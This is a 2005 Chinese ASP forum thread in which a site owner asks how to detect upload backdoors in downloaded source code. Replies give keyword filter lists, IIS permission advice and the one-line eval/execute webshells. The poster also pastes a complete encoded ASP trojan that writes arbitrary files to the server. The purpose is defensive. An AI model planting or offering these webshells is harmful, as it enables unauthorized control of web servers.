高分求救,关于asp后门特征字符!

goldensaint 2005-10-25 03:42:03
我下载了一套源代码,其中肯定是有后门的,也就是说别人可以利用这个后门上传asp木马

现在我仔细搜索了所有文件,用“CreateObject("Adodb.Stream")”和“createobject("scripting.filesystemobject")”作为关键字搜查,搜出的所有有关文件认真审核,确保没有漏洞,是否高枕无忧?

也就是说:上传后门是否一定会使用“CreateObject("Adodb.Stream")”和“createobject("scripting.filesystemobject")”,请高手帮我则个

...全文
201 19 打赏 收藏 转发到动态 举报
写回复
用AI写文章
19 条回复
切换为时间正序
请发表友善的回复…
发表回复
libofeng 2005-12-21
  • 打赏
  • 举报
回复
.encode
goldensaint 2005-12-20
  • 打赏
  • 举报
回复
StrBadWord="server.|.createobject|execute|.encode|eval|request|language=|activexobject"'

这句当然很好
问题在于别人可以把asp编码后上传,这怎么办呢?
libofeng 2005-11-15
  • 打赏
  • 举报
回复
StrBadWord="server.|.createobject|execute|.encode|eval|request|language=|activexobject"'定义恶意代码

我写的一个上传过滤函数里的,可以参考一下
pyusksk503 2005-11-15
  • 打赏
  • 举报
回复
在注册表里面对文件对像进行改名,这样的话,别人就不知道你的。对像名也就相应的增强这方面的安全性
yousite1 2005-11-15
  • 打赏
  • 举报
回复
杀毒软件是没用的.
注意提防eval版后门和execute后门,因为他们就一句话,短小精悍.......


比如<%execute(request("#"))%>或<%eval(request("#"))%>
或者这两个语句的其它变形形式,你可以试着搜索 一下execute和eval,尤其是后面一个语句是最强的.可以像execute一样执行,但如果传递参数为空也不会提示错误发生.
goldensaint 2005-11-15
  • 打赏
  • 举报
回复
有谁知道吗?
goldensaint 2005-10-27
  • 打赏
  • 举报
回复
还有人吗?
goldensaint 2005-10-26
  • 打赏
  • 举报
回复
杀毒软件根本没用的
看看下面这个木马源代码
杀毒软件一点反应都没有

<%@LANGUAGE="VBScript.Encode" CODEPAGE="936"%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>旁注 - 网站小助手</title>
<style type="text/css">
<!--
.black {
font-family: "宋体";
font-size: 12px;
color: #000000;
text-decoration: none;
line-height: 120%;}
-->
</style>
<style type="text/css">
<!--
a:link {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:visited {
font-family: "宋体";
font-size: 12px;
color: #00CC00;
text-decoration: none;
}
a:hover {
font-family: "宋体";
font-size: 12px;
color: #333333;
text-decoration: none;
}
-->
</style>
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>
<%#@~^DAAAAA==~9kh,W(LsUr,vQMAAA==^#~@%>
<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
<%#@~^EgAAAA==~9kh,W(LZKE OsbVnPXgYAAA==^#~@%>
<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
<%#@~^QAAAAA==~U+O,W(LsUr,xPU+.\D /M+lDnr(L+1OcJUmMk2YrUTRok^n?H/Onsr4%n1YE#,ThYAAA==^#~@%>
<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+ PqgwAAA==^#~@%>
<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
<%#@~^QgAAAA==~U+O,W(LZKE OsbVn'K4%oUrR;.+mY+:naYwk^+cDn5!+dYvE/H0[2mYtEbBK.Eb,dRcAAA==^#~@%>
<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
<%#@~^EAAAAA==~b0~DMP'ZPD4+ P1AQAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存成功e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
<%#@~^NwAAAA==~M+daW /+chMrYPE@!6WUO,mW^GD{aswoo!Z@*保存失败e@!&0GUD@*EPNQ8AAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
<%#@~^GgAAAA==~U+O,W(LZKE OsbVn'gWO4bxo,ZAkAAA==^#~@%>
<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
<%#@~^HAAAAA==~"+daW /+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>
</p>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF">
<tr>
<td height="100%">
<table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="700" border="0" align="center" cellpadding="0" cellspacing="1">
<tr>
<td bgcolor="#FFFFFF"><span class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE本文件绝对的路径J,TAYAAA==^#~@%>
<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
<br>
<%#@~^TQAAAA==~"+daW /+chMrYPE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如G)'hn4wacldw*l@!J0GUD@*J~txMAAA==^#~@%>
<%#@~^MwAAAA==~"+daW /+chMrYPE@!6W.h,lmDrW 'BEvvPs+DtGNx2K/O@*r~lRAAAA==^#~@%>
</span> </td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><span class="black">输入保存的路径:<%#@~^RgAAAA==~"+daW /+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4xy!!~dbyn'Rq@*J~qxcAAA==^#~@%>
</span></td>
</tr>
<tr>
<td bgcolor="#FFFFFF" class="black">
<%#@~^GwAAAA==~"+daW /+chMrYPE输入文件的内容:J,TAYAAA==^#~@%>
<%#@~^UwAAAA==~"+daW /+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF"><div align="center"><span class="black">
<%#@~^MQAAAA==~"+daW /+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPIxAAAA==^#~@%>
</span></div></td>
</tr>
</tr>
<td bgcolor="#FFFFFF" class="black"><div align="center"></a></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
ybfqlyq 2005-10-25
  • 打赏
  • 举报
回复
不懂,學習一下。
ahuiok 2005-10-25
  • 打赏
  • 举报
回复
我觉得,除了杀毒软件来杀,没有更好的办法。



海洋顶端那个我也研究了很久! 服务器配置好像一直不行!
goldensaint 2005-10-25
  • 打赏
  • 举报
回复
嗯,大概明白了

但是我还想问一下:如果这个后门存是为了上传文件而设的
那么是否一定会用到Stream流格式上传和fso上传?
有没有其他的办法也可以上传文件?
fantiny 2005-10-25
  • 打赏
  • 举报
回复
iis里面设置的上传文件的保存路径为不允许执行任何文件和脚本。
亚特兰斯 2005-10-25
  • 打赏
  • 举报
回复
解决方法:
1.用瑞星查杀,瑞星能查杀大部分的asp脚本病毒(木马),我测试的asp探针程序都作为木马查杀了。
2.合理设置好服务器的Acl权限,为你的站点单独建一个IIS帐号,你web站点的目录权限只允许你创建的帐号具有访问权限,删除everyone,users等群组权限。

另外:sql注入会让你死的很难看,后门只要设置好Acl只能对单个网站目录和所在文件夹起作用。
TaoTaoYou 2005-10-25
  • 打赏
  • 举报
回复
如果轻易让你察觉到还留什么呀??不是徒劳吗?你说呢...
TaoTaoYou 2005-10-25
  • 打赏
  • 举报
回复
后门?他可以在任何地方轻而易举的给你留一个小小的洞,,如果你不是程序的作者,是很难发现的,,
goldensaint 2005-10-25
  • 打赏
  • 举报
回复
求救
goldensaint 2005-10-25
  • 打赏
  • 举报
回复
sql注入漏洞我觉得危害不是很大,了不起拿到我站点管理员密码

但是后门就危险了,上传个海洋顶端,死的真是难看,请各位大哥帮我想想

除了Stream流格式上传和fso上传外,后门还会以什么方式上传文件?
tigerwen01 2005-10-25
  • 打赏
  • 举报
回复
这东西很难找,但有一点就是要注意系统的SQL语句。
goldensaint 2005-10-25
  • 打赏
  • 举报
回复
说明:所有文件都没有加密,都是原文,这一点我已确认

28,406

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧